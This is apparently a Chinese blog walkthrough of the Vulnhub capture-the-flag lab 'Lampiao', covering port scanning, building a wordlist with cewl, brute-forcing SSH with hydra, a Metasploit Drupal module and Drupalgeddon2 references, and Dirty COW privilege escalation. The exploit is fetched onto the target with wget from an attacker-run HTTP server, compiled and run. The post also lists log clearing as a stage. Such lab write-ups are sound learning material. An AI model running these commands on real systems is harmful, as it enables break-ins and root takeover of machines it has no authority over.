【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)
靶场地址 提取码:rong


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年8月30日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

`


前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


一、梳理流程

  1. 端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
  2. 信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
  3. 二次收集(基于已得到的服务或者主机再次信息收集)
  4. 内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
  5. 毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)

二、使用步骤

1.端口发现

代码如下:

ifconfig                  //用来查看自己的IP
namp 192.168.247.0/24 -sP //用来扫描同网段所有存活主机,注意最后是0
这个IP是你ifconfig出来的IP
nmap -p- 192.168.247.134  //扫描开放端口,找服务

在这里插入图片描述

开放了一个web,还有一个ssh,还有一个未知的
思考ssh爆破的可能性,这就需要我们去web页面信息收集

2.web突破

在这里插入图片描述

打开是这样,源码也是这样,没有任何信息,这个时候有两种选择,要么会有其他的端口有其他的服务,要么在旁站有其他的服务,我们先看看之前那个未知的端口

在这里插入图片描述

这是1898端口的服务,没有账户密码就不考虑爆破登陆了,几乎没有可能性,有一个read more 我们点开

在这里插入图片描述

红框看到了明显的序列排列,那么这里有可能有sql注入,或者是隐藏信息,我们先改一下数字看看有啥。

在这里插入图片描述

改成2有两个文件

在这里插入图片描述

改成3也有,依次访问
audio.m4a:语音获得用户名:tiago
qrc.png:图片二维码扫描获得信息,需要爆破

至此这个端口信息收集的基本上完毕,开始爆一下网站的旁站,可以利用dirb,也可以用御剑或者啥的,看你自己

在这里插入图片描述

我用的铸剑,这个我就扫了一下,字典80万,太慢了,有这个就够了
又想要的私聊我

在这里插入图片描述

访问了robots.txt,看到了一些.txt文件,去看看

在这里插入图片描述

是一个介绍cms版本的,Drupal 7.54, 2017-02-01(这里肯定有版本漏洞,不过并不能让我们获取shell)
但这里,web能利用的基本上利用完了,没什么信息可以收集的了,也就可能之前有个sql注入,我用sqlmap跑了一遍,也并没有很能利用的点,视线再次回到端口,想到了ssh,一想到这,就想到之前有一个语音跟我们说了用户名,那就是爆破;那么密码从哪里来?在ctf靶场中,我们要知道可以使用cewl来遍历页面收集出一份密码,那么这里我们试试。

cewl http://182.168.247.128:1898/?q=node/1 -w rong.txt
--先把页面收集到的密码写入rong.txt
hydra -l tiago -P rong.txt 192.168.247.128 ssh
--利用九头蛇爆破  语法可以百度,日常使用语法很简单
得到密码如下
用户: tiago
密码: Virgulino

1.SSH突破

ssh tiago@192.168.247.128    --登录ssh,密码输入不显示,输就行了
id   ----查看当前用户,发现是低权限用户,需要提权

2.msf突破

msfconsole
search  Drupal
use unix/webapp/drupal_restws_exec
set rport 1898
set rhosts 192.168.247.128

meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'

成功通过漏洞渗透进入系统,获得低权限用户,和前面ssh登陆的tiago用户权限类似,
这是另外一种渗透的方法,比较方便。

3.漏扫突破

带着xray进去点点点(xray是一款被动扫描器),也可以联动awvs来一起工作
可以很快的知道有没有漏洞

在这里插入图片描述像这就扫到一个cve-2022-23779的漏洞
在这里插入图片描述

还有一个Drupal CVE-2018-7600的RCE
给出了两个链接
https://github.com/dreadlocked/Drupalgeddon2 --里面都有详细用法
https://paper.seebug.org/567/
bp抓包把xray的请求头写进去就好,调试到200,按照给出的poc去使用即可
这个rb在用的时候会报错,我们需要排错

sudo gem install highline

三.内网突破

1.寻找exp

利用之前的已知cms,寻找EXP
网上搜到这个版本的cms可以使用脏牛通杀

2.利用漏洞

在这里插入图片描述

msf搜索到exp还要去官网看一下怎么使用,直接谷歌搜索40847就行
红框里面就是我们的利用方法:按照这个去写命令即可

searchsploit dirty
使用:Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privile | linux/local/40847.cpp

python -m http.server 8081
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/
-----把exp复制到桌面
继续开启本地pthon服务,然后把40847.cp发送到靶机上:
wget http://192.168.247.129:8081/40847.cpp
------

命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o rong 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件../rong     --执行文件
Root password is:   dirtyCowFun
获得root用户密码!

9、登录root-ssh
ssh root@192.168.247.128
ls
root@lampiao:~# cat /root/flag.txt 
9740616875908d91ddcdaa8aea3af366

四.总结

1.cewl的页面爬虫获取密码本
2.利用msf快速拿shell
3.漏扫出漏洞
4.脏牛提权多快好省

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值